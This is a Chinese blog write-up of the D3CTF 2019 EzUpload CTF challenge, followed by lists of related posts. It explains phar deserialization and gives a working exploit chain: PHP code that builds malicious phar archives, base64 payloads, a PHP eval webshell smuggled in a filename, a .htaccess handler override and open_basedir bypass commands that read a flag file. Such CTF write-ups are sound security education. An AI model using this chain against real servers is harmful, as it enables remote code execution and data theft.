[D3CTF 2019]EzUpload 84

已于 2022-03-30 15:11:44 修改
阅读量662 收藏 2
点赞数
分类专栏: BUUCTF 文章标签: php smart web安全
于 2022-03-30 15:10:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shinygod/article/details/123831499
版权 
知识点:phar反序列化,.htaccess

phar反序列化

这篇讲的非常细:[https://www.cnblogs.com/zzjdbk/p/13030571.html]

原理
phar://可以解析一个phar的php打包程序,且phar打包程序里有我们的shell
那么phar打包文件怎么生成呢?
只要访问页面,就可以通过下面这个来生成一个.phar。

<?php
#要把php.ini中的phar.readonly设置成Off,不然无法生成phar文件
    class TestObject {
    }
    $phar = new Phar("phar.phar"); //后缀名必须为phar
    $phar->startBuffering();
    $phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>"); //设置stub
    $o = new TestObject();
    $o -> data='hu3sky';
    $phar->setMetadata($o); 
    //将自定义的meta-data存入manifest,且这部分是以序列化的形式存在
    $phar->addFromString("test.txt", "test"); //添加要压缩的文件,因为phar相当于一个解压缩,前提就是要现有.phar文件,然后又因为meta-data是由序列化存储,这边添加一个压缩文件包,就是为了在用phar://伪协议的时候触发meta-data的反序列化
    //签名自动计算
    $phar->stopBuffering();
?>

phar://是怎么执行.phar中的shell的呢?
我们可以看一下.phar的构造,可以清晰的看到里面的meta-data部分,是以序列化的形式构成的。
在这里插入图片描述
且在php中有一部分的函数是可以在通过phar://伪协议解析phar文件时,反序列此文件,从而执行meta-data中的内容。
可以反序列化meta-data的函数图
在这里插入图片描述
phar利用条件:(来自上面的那篇博客

 1. php文件要能够上传到服务器端。
 2. 如file_exists(),fopen(),file_get_contents(),file()等文件操作的函数
 3. 要有可用的魔术方法作为“跳板”。
 4. 文件操作函数的参数可控,且:、/、phar等特殊字符没有被过滤。

注意点

析构函数执行时会改变当前的工作路径,会改为apache的目录。

__destruct下的默认路径为系统根目录,而不是web的根目录,所以要想办法获得我们上传文件的绝对路径。

Write up

这边我就不放过滤函数了。

<?php
class dir{
    public $userdir;
    public $url;
    public $filename;
    public function __construct($url,$filename) {
        $this->userdir = "upload/" . md5($_SERVER["REMOTE_ADDR"]);//ip地址md5加密,作为文件夹名字
        $this->url = $url;
        $this->filename  =  $filename;
        if (!file_exists($this->userdir)) {//创建一个文件夹
        //如果此ip目录不存在,则创建一个目录,且最大可能的访问权(0777),允许多级嵌套
            mkdir($this->userdir, 0777, true);
        }
    }
    public function upload(){
        $this->checkdir();
        $this->checkurl();
        $this->checkext();
        $content = file_get_contents($this->url,NULL,NULL,0,2048);//可以触发phar://执行我们在__destruct里面写的文件,也就是.phar
        if (preg_match("/\<\?|value|on|type|flag|auto|set|\\\\/i", $content)){
            //上传的文件内容不能有上面那些
            die('hacker!!!');
        }
        file_put_contents($this->userdir."/".$this->filename,$content);//把内容写入userdir/filename中,内容为url的内容
    }
    
    public function __toString() {
        return implode(" ",scandir(__DIR__."/".$this->userdir));
         //将一个一维数组的值转化为字符串
    }
    public function __destruct() {
        //对象结束时候掉用,返回目录名,及文件名
        $string = "your file in : ".$this->userdir;
        file_put_contents($this->filename.".txt", $string);
    }
}

思路:可以通过upload里的file_get_contents:$this->url,来触发phar反序列化,从而触发__destructfile_put_contents进行写文件,虽然只能写.txt类型的文件,但我们可以上传.htaccess文件来php解析,又因为析构函数与__destruct目录路径的问题,所以我们还要知道它的绝对路径,以绝对路径写入我们的文件,可以通过__toString来获得。

先获取它的绝对路径

<?php
    class dir{
    public $userdir;
    public $url;
    public $filename;
    }
 
   $phar = new Phar("phar.phar"); //后缀名必须为phar
   $phar->startBuffering();
   $phar->setStub(" __HALT_COMPILER(); "); //设置stub
   $o = new dir();
   $a = new dir();
   $a->userdir='../';
   $o->userdir=$a;
   $phar->setMetadata($o); //将自定义的meta-data存入manifest
    $phar->addFromString("test.txt", "test"); //添加要压缩的文件
    //签名自动计算
    $phar->stopBuffering();
?>

先把能获取路径的phar文件的base64上传

action=upload&filename=mull.txt&url=data:image/png;base64,IF9fSEFMVF9DT01QSUxFUigpOyA/Pg0KsgAAAAEAAAARAAAAAQAAAAAAfAAAAE86MzoiZGlyIjozOntzOjc6InVzZXJkaXIiO086MzoiZGlyIjozOntzOjc6InVzZXJkaXIiO3M6MzoiLi4vIjtzOjM6InVybCI7TjtzOjg6ImZpbGVuYW1lIjtOO31zOjM6InVybCI7TjtzOjg6ImZpbGVuYW1lIjtOO30IAAAAdGVzdC50eHQEAAAA3PNDYgQAAAAMfn/YtgEAAAAAAAB0ZXN0H0IYEtttGKjXmOSmTMu7uLMCO3ICAAAAR0JNQg==

在用phar://反序列化

action=upload&filename=&url=phar://upload/cc551ab005b2e60fbdc88de809b2c4b1/mull.txt

原因是:
在这里插入图片描述
这边的string连接了两个字符串,触发了__toString,返回scandir(__DIR__."/"."../")上级目录。
在这里插入图片描述
现在我们就可以看到我们的上级路径。
在这里插入图片描述
然后我们需要传一个带有一句话木马文件名的文件,等会要用。

action=upload&filename=<?php eval($_GET['cmd']); ?>.txt&url=http://xxx

接下来就是要写包含一句话木马的文件了。

<?php
    class dir{
    public $userdir;
    public $url;
    public $filename;
    }
   $phar = new Phar("phar.phar"); //后缀名必须为phar
   $phar->startBuffering();
   $phar->setStub(" __HALT_COMPILER(); "); //设置stub
   $o = new dir();
   $a = new dir();
   $a->userdir='upload/cc551ab005b2e60fbdc88de809b2c4b1/';
   $o -> filename= '/var/www/html/61cb6463141119ab/upload/cc551ab005b2e60fbdc88de809b2c4b1/webshell';
   $o->userdir=$a;
   $phar->setMetadata($o); //将自定义的meta-data存入manifest
   $phar->addFromString("test.txt", "test"); //添加要压缩的文件
    //签名自动计算
   $phar->stopBuffering();
?>

这边用的还是这个
在这里插入图片描述
原理:使得$string = "your file in : ".$this->userdir;触发__toString,而__toString会返回return implode(" ",scandir(__DIR__."/".$this->userdir));,也就是我们传上去的所有文件名,包括一句话木马,然后写入filename,又因为__destruct,我们需要上传绝对路径,因为__destruct默认是系统根目录,而不是web根目录,我们要在网站里访问我们的文件,所以要以绝对路径写。

action=upload&filename=phar.txt&url=data:image/png;base64,IF9fSEFMVF9DT01QSUxFUigpOyA/Pg0KLQEAAAEAAAARAAAAAQAAAAAA9wAAAE86MzoiZGlyIjozOntzOjc6InVzZXJkaXIiO086MzoiZGlyIjozOntzOjc6InVzZXJkaXIiO3M6NDA6InVwbG9hZC9jYzU1MWFiMDA1YjJlNjBmYmRjODhkZTgwOWIyYzRiMS8iO3M6MzoidXJsIjtOO3M6ODoiZmlsZW5hbWUiO047fXM6MzoidXJsIjtOO3M6ODoiZmlsZW5hbWUiO3M6Nzk6Ii92YXIvd3d3L2h0bWwvNjFjYjY0NjMxNDExMTlhYi91cGxvYWQvY2M1NTFhYjAwNWIyZTYwZmJkYzg4ZGU4MDliMmM0YjEvd2Vic2hlbGwiO30IAAAAdGVzdC50eHQEAAAAqPxDYgQAAAAMfn/YtgEAAAAAAAB0ZXN03BgnoIJsZcZoI7qPifWAxeFFBnICAAAAR0JNQg==

在这里插入图片描述
虽然此时我们的webshell文件已经包含shell,但是它还是.txt格式,所以我们要上传一个.htaccess解析它。

action=upload&filename=.htaccess&url=data:image/png;base64,QWRkSGFuZGxlciBwaHA3LXNjcmlwdCAudHh0

然后再访问webshell.txt,,写shell,这样读文件是因为有open_basdir

详细解读:https://xz.aliyun.com/t/4720#toc-4

?cmd=ini_set(%27open_basedir%27,%20%27..%27);chdir(%27..%27);chdir(%27..%27);chdir(%27..%27);chdir(%27..%27);chdir(%27..%27);chdir(%27..%27);ini_set(%27open_basedir%27,%20%27/%27);var_dump(scandir(%27/%27));

在这里插入图片描述

?cmd=ini_set(%27open_basedir%27,%20%27..%27);chdir(%27..%27);chdir(%27..%27);chdir(%27..%27);chdir(%27..%27);chdir(%27..%27);chdir(%27..%27);ini_set(%27open_basedir%27,%20%27/%27);var_dump(file_get_contents(%27/F1aG_1s_H4r4%27));

在这里插入图片描述

参考:
https://www.jianshu.com/p/4bf8614fb944
https://nikoeurus.github.io/2019/11/26/D%5E3ctf-Web/#ezupload

succ3
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ezupload:yii ezupload 文件系统
06-10
#ezupload档案上传系统 ezupload档案上传系统是一个简易的档案上传系统,提供了使用者注册与上传并管理自己档案功能,而管理者也可以轻易的管理所有上传的档案,该系统可以快速的建立并应用于研讨会论文上传管理或学生专题档案上传管理之用。 ##建置教学 php版本需要5.4以上 下载压缩档后解压缩放置您的网站目录,如/var/www/html 修改档案目录权限为可以读写,其目录为<your>/web 开启终端机输入以下指令安装系统需要的套件composer install 修改资料库连线设定,开启<your>/config/db.php设定资料库连线ip、资料库名称、使用者帐号与密码 开启终端机进入专案目录,输入以下指令系统会自动建置资料表单./yii migrate 修改档案目录权限为可以读写,其目录为<your project
CTFweb篇——upload-labs
suiyideAli的博客
09-24 1449
0x00 前言 本次以upload-labs的Pass-00和pass-01为例。 0x01 进入靶场 pass-00 首先查看Pass-00题目,任务要求上传一个webshell到服务器,编写一句话木马,然后上传 右键复制图像地址,连接菜刀: 找到flag,提交,OK。 0x02 Pass-01(方法一) 查看题目要求,也是需要我上传一个webshell到服务器...
2019 D3CTF ezupload题解
读万卷书,行万里路。
08-15 1272
0 前言 一个 PHP 反序列化的题目。虽然序列化的的利用链简单,但是还是踩了很多坑。 1 题解 序列化脚本:serialize.php <?php class dir{ public $userdir; public $url; public $filename; } $o = new dir(); $tmp = new dir(); $tmp->userdir = $argv[1]; // 需要扫描的目录 $o->userdir = $tmp; $o-
buu刷题记录 [D3CTF 2019]EzUpload
weixin_51458899的博客
04-08 1686
[D3CTF 2019]EzUpload © 参考[D3CTF 2019]EzUpload(phar反序列化/.htaccess+phar关键字绕过) | (guokeya.github.io) 参考[D3CTF 2019]EzUpload - 简书 (jianshu.com) 参考2019 D3CTF ezupload题解_slug01sh的博客-CSDN博客 代码审计,很快发现htaccess,phar没有过滤,试图挖链子发现可以! 链子并转为phar <?php class dir{
[D3CTF 2019]EzUpload gzip压缩phar .htaccess内容正则绕过 glob://爆破目录 绕过open_basedir
a3320315的博客
02-21 1595
源码 <?php class dir{ public $userdir; public $url; public $filename; public function __construct($url,$filename) { $this->userdir = "upload/" . md5($_SERVER["HTTP_X_REAL_I...
php upload ctf,强网杯CTF防御赛ez_upload Writeup
weixin_35645813的博客
03-17 1100
这是强网杯拟态防御线下赛遇到的web题目,本来是不打算分享Writeup的,但是由于问的人很多,于是这里分享给大家。ez_upload这题算是非常经典的堆叠black trick的题目,算是比较典型的ctf式题目(虽然现在大家都很抵制这样的题目),这里主要是分享Writeup以及我们队在完成题目时的思考流程。ez_upload 思考流程最开始我先描述一下题目逻辑。1、login.php,登陆页面,...
D^3CTF 2019 Challenges.zip
08-16
D^3CTF 2019 CTF
D3CTF2022-官方WriteUp1
08-03
"D3CTF2022-官方WriteUp1" 本文将对 D3CTF 2022 官方 WriteUp1 进行总结,主要涉及 MySQL UDF 提权、Java 反序列化、MySQLInject、Web 短链技术等多方面的知识点。 1. MySQL UDF 提权 在 MySQL 中,可以使用 User...
2019领航杯CTF题目
11-25
2019领航杯CTF的原题,文件恢复和DNS两题没有
D3CTF2021-d3dev
最新发布
11-05
附件
ctf2019.exe
07-05
WCTF2019的题目 ctf2019.exe
【PolarCTF】ezupload
m0_73818758的博客
09-24 442
将Content-Disposition: form-data;得到flag为:flag{ffffffffllllaaggg_!
[2019EIS高校运维赛]ezupload
xlcvv的博客
04-17 3144
ezupload ezbypass 一、ezupload 先来一个之前的思路 随意输入username和oassword: 又试了一下万能密码,也是login failed,那就想到了sql注入,抓包另存为txt文件: 用username做注入点,失败。看了大佬的wp后才知道,网页源码下有个小提示: 下载下来,是个swp文件: swp文件是文件在编辑的过程中,由于不正当结束,会存在修...
php反序列化漏洞基础
Anton__1的博客
08-31 976
PHP序列化与序列化 作者:H3h3QAQ 一、PHP序列化和反序列化 1.PHP反序列化: serialize() 将变量或者对象转换成字符串的过程,用于存储或传递PHP的值的过程种,同时不丢失其类型和结构 常见的序列化字母表示及其含义: a - array ----->a:<n>:{<key 1><value 1>...<key n><value n>} b - boolean ----->b:<digit> d
i春秋 web 简单的招聘系统(sql注入)、ezupload(upload)
H4ppyD0g的博客
02-29 797
简单的招聘系统(sql注入) 登录界面可以使用万能密码登录1' or 1=1;# 然后再search for key模块进行盲注(我不会。。。) 看wp,有的人是直接在登录界面进行sql盲注 1' or (ascii(substr((select(group_concat(flaaag))from(flag)),1,1))=102)#就可以登录成功,因为or 1时,1就是真值,所以前面不管or什么...
克拉玛依市第一届网络安全技能大赛-团队赛WP
t235336456的博客
11-28 3564
此次比赛偏中等难度,高级中学十三年团队共解出6题,不过还是乱杀 排名第二,还是很开心的团队名称:高级中学十三年解题人:xinyi,糖糖Web1. ezbyp@ss 打开容器以后看到a和b是进行md5碰撞还要使得a≠b构造a和b a=QNKCDZO&b=240610708if (isset($_POST['password'])){ if ((($_POST['password'])>9999999)&&((strlen($_POST['password']))
青少年CTF训练平台-WEB-部分wp
SwBack的博客
04-04 2347
扫描发现备份文件 打开发现flag直接上传,然后获取flag木马地址,通过扫描目录发现。直接添加请求头user-agentt: zerodiumsystem(‘cat /flag’);连接之后,查找具有权限的命令根据提示直接发现flag 提示说明没有中文但是仍然错误,查看shadow,通过john破解密码 用户名后有$y,则表明密码已使用 yescrypt 进行哈希处理指定format参数 新手的登录 使用提示的user账号登录之后抓包修改cookie为admin。发包,得到flag访问之后直接查看js
d3ctf_2019_ezfile(文件流fileno的巧妙利用)
seaaseesa的博客
06-11 1029
d3ctf_2019_ezfile(文件流fileno的巧妙利用) 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,delete功能存在UAF 程序里使用的是write输出,因此劫持IO_2_1_stdout泄露不了数据。 Add功能的size固定 Encrypt功能存在栈溢出 程序一开头有一个这个 我们可以利用堆漏洞劫持IO_2_1_stdin,将里面的fileno改为3,然后利用encrypt功能里的栈溢出,采用低字节覆盖法,将返回地址覆盖到此处 .
2020 年 V&N 内部考核赛 WriteUp
a3320315的博客
03-01 2654
CheckIN 源码 from flask import Flask, request import os app = Flask(__name__) flag_file = open("flag.txt", "r") # flag = flag_file.read() # flag_file.close() # # @app.route('/flag') # def flag(): # ...
[D3CTF 2019]EasyWeb
07-28
回答: \[1\]根据引用\[1\]中的描述,当将Smarty嵌入到CI框架中时,可能使用的是一个兼容低版本Smarty的引擎,而不是最新的Smarty引擎。这可能是因为参考的文章比较旧,导致整合时选择了兼容低版本的引擎。 \[2\]引用\[2\]中提到,CI框架的类是按需加载的,而不是自动加载的。这导致在全局搜索__destruct方法时可能会出现很多结果,但实际上无法使用。这可能是导致pop链不好找的一个重要原因。 \[3\]引用\[3\]中提到,在phpinfo中发现了一个flag,这表明还有另一种方法可以获取flag,即通过get_the_flag方法。然而,get_the_flag方法有两个过滤条件,一个是不允许出现"<?",另一个是对文件头字节进行过滤。作者提到可以传递一个文本文件,内容进行base64编码,并加上图片头字节,然后再传递一个.htaccess文件进行解码。 综上所述,\[D3CTF 2019\]EasyWeb可能涉及到使用兼容低版本的Smarty引擎、按需加载的类导致pop链难以找到,以及通过绕过过滤条件来获取flag的方法。 #### 引用[.reference_title] - *1* *2* [d3ctf easyweb题解](https://blog.csdn.net/weixin_42474164/article/details/116281650)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [[SUCTF 2019]EasyWeb](https://blog.csdn.net/shinygod/article/details/124045024)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值